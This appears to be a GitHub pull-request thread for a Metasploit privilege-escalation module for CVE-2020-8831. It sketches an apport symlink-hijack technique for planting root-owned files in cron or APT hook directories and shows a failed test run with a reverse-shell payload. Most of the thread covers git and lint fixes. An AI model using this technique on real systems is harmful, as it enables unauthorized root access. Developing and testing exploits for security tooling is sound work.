Add Apport Symlink Hijacking: CVE-2020-8831

[gardnerapp]

This pull request is a draft for CVE-2020-8831, I originally came across this vulnerability while reading From Day Zero to Zero Day, which I highly recommend. The long story short is that certain versions of apport will follow symbolic links when writing crash dumps. This file will have a mask of 777 and be owned by root. In this module I used the command ln -s /cron.d /var/lock/apport so that a /etc/cron.d/lock crontab file would be created. This crontab should execute a payload every minute which was located in the /tmp directory.

After scratching my head for several hours and combing through the log files I found that the crontab would not execute because it's file permissions were too excessive. We need to find another place for the symlink hijacking to occur. I have a few places in mind namely /etc/init.d/ or ~/.bashrc which would trigger the payload upon startup. I am submitting this because I am unsure of which route to go or if there are other places where the symlink hijacking should occur. Thank you !

[gardnerapp]

I've accidentally committed pushes from another module. My apologizes, I am unsure of the proper way to remove these.

[bwatters-r7]

I've accidentally committed pushes from another module. My apologizes, I am unsure of the proper way to remove these.

No problem; git is really awesome, but not always super intuitive.

It looks like the unwanted commits are all related to your previous game overlay module.
I can think of 3 ways to fix it (in order of what I would try first)

1. Rebase and only bring in the changes for the new module
2. Open a new branch current with master, check the file you want out to it, commit the changes, then force-push the new branch with just the new module to your existing branch
3. Open a new branch that's current with master, then get merge --cherry-pick the changes you want.

Last, if you want, let me know and I am pretty sure I can fix it for you, but you might lose some commits. The only file you need here is modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb, right?

[gardnerapp]

Yes, I only want the files relevant to this module pushed. I just added the rebase let me know if it is sufficient.

[bwatters-r7]

Yes, I only want the files relevant to this module pushed. I just added the rebase let me know if it is sufficient.

Looks good! Let us know when you'd like us to review it.

[bcoles]

For local exploit modules, this is usually registered as an advanced option:

    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]

[gardnerapp]

Finished review

[gardnerapp]

I accidentally committed a file for another exploit please ignore.

[bwatters-r7]

Pertinent failing test log entries:

modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb - [ERROR] Incorrect disclosure date format
== modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb ==
W: 19: 19: [Correctable] Lint/DetectMetadataTrailingLeadingWhitespace: Metadata key or value has leading or trailing whitespace.

1 file inspected, 1 offense detected, 1 offense autocorrectable
modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb and verify all issues are resolved

[gardnerapp]

Pertinent failing test log entries:

modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb - [ERROR] Incorrect disclosure date format
== modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb ==
W: 19: 19: [Correctable] Lint/DetectMetadataTrailingLeadingWhitespace: Metadata key or value has leading or trailing whitespace.

1 file inspected, 1 offense detected, 1 offense autocorrectable
modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb and verify all issues are resolved

Which log files are you checking? When I run rubocop this is the result:

 ~/metasploit-framework cve-2020-8831 $ rubocop -A modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
Inspecting 1 file
.

1 file inspected, no offenses detected

[gardnerapp]

I've checked the commit history of the Apport package and it looks like the vulnerable function check_lock exists in apport/data/apport. as far back as 16 years ago. The check method currently returns CheckCode::Appears if the installed version is equal to 2.20.11 . As I have verified that earlier versions of Apport are vulnerable to this I would like to have the check method return CheckCode::Appears if the installed version is <= 2.20.11.

Additionally, when a normal user runs apt-get update or any other command which triggers the apt hook they'll notice that the command hangs. I've added notes to the module to account for this. Lastly, I've begun working on the documentation.

[bwatters-r7]

When I look at the latest commit, it is marked as failing github checks (the red X). I can click on that 'x' and it tells me what was failing, and then I can click on the 'details' for that test, and it gives me the report log.

[gardnerapp]

When I look at the latest commit, it is marked as failing github checks (the red X). I can click on that 'x' and it tells me what was failing, and then I can click on the 'details' for that test, and it gives me the report log.

Review error says to rubocop. When I do there are no warnings or errors, here is what I get:

cve-2020-8831 $ rubocop -a modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb 
Inspecting 1 file

1 file inspected, no offenses detected

[bwatters-r7]

Some older dependencies were tripping me up on this branch and the file name change made rebasing a pain, so I just pulled the file into the master branch, and when I ran rubocop, it found the two lint issues:

[ruby-3.3.8@metasploit-framework](upstream-master) tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ git checkout upstream/pr/20037 -- modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
[ruby-3.3.8@metasploit-framework](upstream-master) tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ rubocop -a modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
Inspecting 1 file
W

Offenses:

modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb:19:19: W: [Corrected] Lint/DetectMetadataTrailingLeadingWhitespace: Metadata key or value has leading or trailing whitespace.
        'Name' => 'Apport Symlink Hijacking Privilege Escalation ',
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb:19:19: C: [Corrected] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
        'Name' => "Apport Symlink Hijacking Privilege Escalation",
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1 file inspected, 2 offenses detected, 2 offenses corrected
[ruby-3.3.8@metasploit-framework](upstream-master) tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ 

Odd that it is not showing up for you.

[gardnerapp]

Added a tidy not sure if you saw!

[bwatters-r7]

@gardnerapp can you let me know where you got the vulnerable deb package?

[gardnerapp]

@gardnerapp can you let me know where you got the vulnerable deb package?

Sorry just started new job been busy wearing a suit etc. I did this part a while ago but I think this Ubuntu page should have the download you're looking for.

[bwatters-r7]

I finally got a chance to set this up. Ubuntu 22.04x64 with the application that you sent.
Unfortunately, it fails for me?

msf exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > show options

Module options (exploit/linux/local/cve_2020_8831_apport_symlink_privesc):

   Name              Current Setting       Required  Description
   ----              ---------------       --------  -----------
   HOOKPATH          /etc/apt/apt.conf.d/  no        APT configuration directory.
   PAYLOAD_FILENAME  QejwbaaAOJp           yes       Name of payload
   SESSION           1                     yes       The session to run this module on
   WRITABLE_DIR      /home/msfuser         yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4545             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux_Binary



View the full module info with the info, or info -d command.

msf exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > run
[*] Started reverse TCP handler on 10.5.135.201:4545 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Apport appears to be vulnerable.
[+] The target appears to be vulnerable.
[*] Creating symlink...
[*] Triggering crash...
[-] Exploit aborted due to failure: not-found: exploit was unable to create /etc/apt/apt.conf.d/lock
[*] Exploit completed, but no session was created.
msf exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > 

[bwatters-r7]

It looks like the crash does crash, though....

[gardnerapp]

I've added some debugging statements to try and figure out what the file perms look like before an after the crash. Because the module runs sleep 10s & kill -11 $! a crash is going to occur no matter what. In the past issues have been encountered when some of the files are missing. I'll try to confirm that everything is working as expected on my system